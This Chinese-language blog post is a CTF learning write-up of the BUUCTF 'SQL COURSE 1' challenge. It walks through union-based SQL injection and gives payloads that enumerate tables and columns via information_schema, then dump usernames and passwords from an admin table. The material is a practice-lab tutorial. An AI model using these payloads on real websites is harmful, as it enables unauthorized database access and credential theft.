首页 > 数据库 > 捡起ctf学习 day3 BUU SQL COURSE 1

捡起ctf学习 day3 BUU SQL COURSE 1

时间:2023-10-30 12:37:08浏览次数:41  
标签:group name union day3 BUU COURSE table select schema

一.BUU SQL COURSE 1

SQL注入

类型

字符型、数字型、搜索型

过程

F12找到了隐藏url,存在get请求传参

?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1、判断是否存在注入、注入是字符型还是数字型

id=1 order by 1#

 id=1' order by 1#

 数字型

2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致)

id=1 order by 2#

id=1 order by 3#

 说明select查出了两列

或者直接union select也可以判断

 

3、确定显示位置(确定在屏幕上显示的结果与select查询列的对应关系,因为某些网页可能会适当调整输出结果的排列顺序,更加美观,但是在注入前,我需要知道我想要获取到的结果会在哪里显示)

 

4、获取当前数据库名,获取表名,字段名,内容

由于information_schema这个库是mysql的四个基本系统库之一,它存储了mysql的库名、表名、字段名等信息。可以用information_schema来查询该库名下的所有表名。由于表可能不止是一个,那无法存储到一个字段中,就可以用group_concat来拼接,形成一个字符串来进行返回。

在information_schema数据库中还可以利用的表:

schema_name  储存了所有数据库的库名

table_schema      储存了数据库名

tables                储存了数据库库名,以及该库中包含的表名

table_name       储存了表名

columns     储存了所有字段名


0 union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema=database()#
0 union select group_concat(username),group_concat(password) from admin

 

 拿到密码,去登陆

 

标签:group,name,union,day3,BUU,COURSE,table,select,schema
From: https://www.cnblogs.com/cheif/p/17789186.html

相关文章

  • Discourse 的用户快速找到管理员账号
    在Discourse的社区中可能有多个用户账号为管理员或者有特殊权限的账号。这个账号在Discourse的用户,然后Staff中可以快速找到。作为管理员,有时候需要检查下你的Discourse是不是没有进行管理,有多长时间没有登录了。编辑这个选项能够让你对Discourse的用户管理员进行一些快......
  • Buu web easysql and Havefun
    1.easysql:(sql注入)解题思路:1、手工sql注入判断注入类型。2、构造pyload输入1’判断注入类型页面报错,说明为字符型,在构造pyload时候,需要主要闭合'。pyload:1'or1=1#(#的意思是把后面的注释掉,在这里是注释掉后面',保证语句正常执行)用or是因为1=1为真,那么无论前面的条......
  • 捡起ctf学习 day2 Linux BUU LFI COURSE 1(Local File Include) burpsuite爆破
    1.LocalFileInclude打开网页 文件包含漏洞,参考知乎专栏https://zhuanlan.zhihu.com/p/540864302随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个......
  • 算法训练day39LeetCode738.968.
    算法训练day39LeetCode738.968.738.单调递增的数字题目738.单调递增的数字-力扣(LeetCode)题解代码随想录(programmercarl.com)classSolution{public:intmonotoneIncreasingDigits(intn){stringstrNum=to_string(n);//int转换string......
  • 来看看 Discourse 3.2.0.beta2 版本添加的新功能
    3.2.0.beta2版本是在2023-10-16发布的,工具官方的说法,主要添加了3个新功能。官方的发布日志页面:3.2.0.beta2:Autodeleteunusedtags,customdaterangeforreports,newchatnotifications,andmore-announcements-DiscourseMeta自动删除标签功能Discourse会对没......
  • 来看看 Discourse 3.2.0.beta2 版本添加的新功能
    3.2.0.beta2版本是在2023-10-16发布的,工具官方的说法,主要添加了3个新功能。官方的发布日志页面:3.2.0.beta2:Autodeleteunusedtags,customdaterangeforreports,newchatnotifications,andmore-announcements-DiscourseMeta自动删除标签功能Discourse会......
  • 算法训练day37 LeetCode860.406.452.
    算法训练day37LeetCode860.406.452.860.柠檬水找零题目860.柠檬水找零-力扣(LeetCode)题解代码随想录(programmercarl.com)5:收五元10:收十元,返五元20:优先还十元+五元;否则还五元*3classSolution{public:boollemonadeChange(vector<int>&bills)......
  • DataWhale DAY3 数据类型和操作
    DataWhaleDAY3数据类型和操作写在前面的:python基本操作统一放在https://www.cnblogs.com/hewo/p/17635277.html本文放一些有意思的东西首先味大的python提供了很是自动的动态类型。对象性质作为一个面向对象的语言,python具有很好的“面向对象友好”性质。举个例......
  • 算法训练day36 1005.134.135.
    算法训练day361005.134.135.1005.K次取反后最大化的数组和题目1005.K次取反后最大化的数组和-力扣(LeetCode)题解代码随想录(programmercarl.com)将数字按绝对值大小排序优先将绝对值最大的负数取反剩余步骤将最小非负数取反注意数组大小顺序,以及处理剩余......
  • 算法训练day35 122.55.45.
    算法训练day35122.55.45.122.买卖股票的最佳时机II题目122.买卖股票的最佳时机II-力扣(LeetCode)题解代码随想录(programmercarl.com)将看似复杂的任务分解成小任务--->利润可以视作每连续两天价格差的和--->只取正利润classSolution{public:intmax......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99